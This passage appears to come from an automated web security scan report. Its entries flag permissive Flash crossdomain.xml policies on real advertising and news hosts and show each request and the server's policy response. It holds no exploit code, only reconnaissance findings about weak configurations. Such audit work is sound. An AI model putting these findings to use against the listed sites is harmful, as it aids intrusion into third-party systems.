Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

3.47. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:16:07 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.48. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 07 Sep 2011 14:18:57 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Wed, 07 Sep 2011 14:21:17 +0000 GMT
Etag: 336a6454235e3e8eb7a514ed6046bb68
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

3.49. http://au.adserver.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 01 Sep 2011 16:38:40 GMT
Accept-Ranges: bytes
Content-Length: 2190
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
<allow-access-from domain="*.viki.com" />
<allow-access-from domain="*.vikistaging.net" />
<allow-access-from domain="vikiplayerdemo.heroku.com" />
<allow-access-from domain="*.btrll.com" />
<allow-access-from domain="cdn.visiblemeasures.com" />
...[SNIP]...

3.50. http://au.news.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.news.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.news.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.51. http://au.pfinance.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.pfinance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.pfinance.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.52. http://cm.au.thewest.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.au.thewest.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.au.thewest.overture.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

3.53. http://cookex.amp.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.54. http://courses.mycareer.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://courses.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: courses.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_education_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Date: Wed, 07 Sep 2011 14:18:07 GMT
Content-Type: text/xml
Last-Modified: Tue, 17 May 2011 03:48:20 GMT
Connection: keep-alive
Expires: Fri, 07 Oct 2011 14:18:07 GMT
Cache-Control: max-age=2592000
Content-Length: 407

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.55. http://feeds.mycareer.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=10800
Content-Length: 392
Content-Type: text/xml
Content-Location: http://feeds.mycareer.com.au/crossdomain.xml
Last-Modified: Fri, 26 Aug 2011 04:55:30 GMT
Accept-Ranges: bytes
ETag: "0cd261ac63cc1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:17:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.56. http://media.perthnow.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.perthnow.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.perthnow.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0331dfe0f891a41f0980259a1864f506:1271030068"
Last-Modified: Sun, 11 Apr 2010 23:54:28 GMT
Accept-Ranges: bytes
Content-Length: 1823
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>

   <allow-access-from domain="pst-pndev.*" />
   <allow-access-from domain="online.wsj.com" />
   
   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova937.com.au" />
   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova969.com.au"/>
   <allow-access-from domain="*.nova100.com.au"/>
   <allow-access-from domain="*.nova919.com.au"/>
   <allow-access-from domain="*.pickyanova.com.au"/>
   <allow-access-from domain="*.novafm.com.au"/>
   
   <allow-access-from domain="*.studentedge.com.au"/>
...[SNIP]...

3.57. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:10 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.58. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 18:56:53 GMT
Expires: Wed, 07 Sep 2011 18:56:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69455

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.59. http://pluck.abc.net.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pluck.abc.net.au

Response

HTTP/1.0 200 OK
Content-Length: 217
Content-Type: text/xml
Content-Location: http://pluck.abc.net.au/crossdomain.xml
Last-Modified: Mon, 22 Aug 2011 09:40:53 GMT
Accept-Ranges: bytes
ETag: "538de96af60cc1:1c8a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="abc.net.au"/>
<allow-access-from domain="*.abc.net.au"/>
<allow-access-from domain="abc.com.au"/>
<allow-access-from domain="*.abc.com.au"/>
</cro
...[SNIP]...

3.60. http://resources.news.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 25 May 2011 00:05:10 GMT
ETag: "f1f565-4c5-4a40e7538d980"
Content-Type: text/xml
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=900
Expires: Wed, 07 Sep 2011 14:30:05 GMT
Date: Wed, 07 Sep 2011 14:15:05 GMT
Content-Length: 1221
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.news.com.au" />
   <allow-access-from domain="*.foxsports.com.au" />
   <allow-access-from domain="*.perthnow.com.au" />
   <allow-access-from domain="*.theaustralian.com.au" />
   <allow-access-from domain="*.dailytelegraph.com.au" />
   <allow-access-from domain="*.heraldsun.com.au" />
   <allow-access-from domain="*.couriermail.com.au" />
   <allow-access-from domain="*.adelaidenow.com.au" />
   <allow-access-from domain="*.themercury.com.au" />
   <allow-access-from domain="*.ntnews.com.au" />
   <allow-access-from domain="*.roo.com" />
   <allow-access-from domain="*.carsguide.com.au" />
   <allow-access-from domain="*.tiser.com.au" />
   <allow-access-from domain="*.vogue.com.au" />
   <allow-access-from domain="*.newsdigitalmedia.com.au" />
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com"/>
...[SNIP]...

3.61. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:19 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.62. http://traktr.news.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://traktr.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

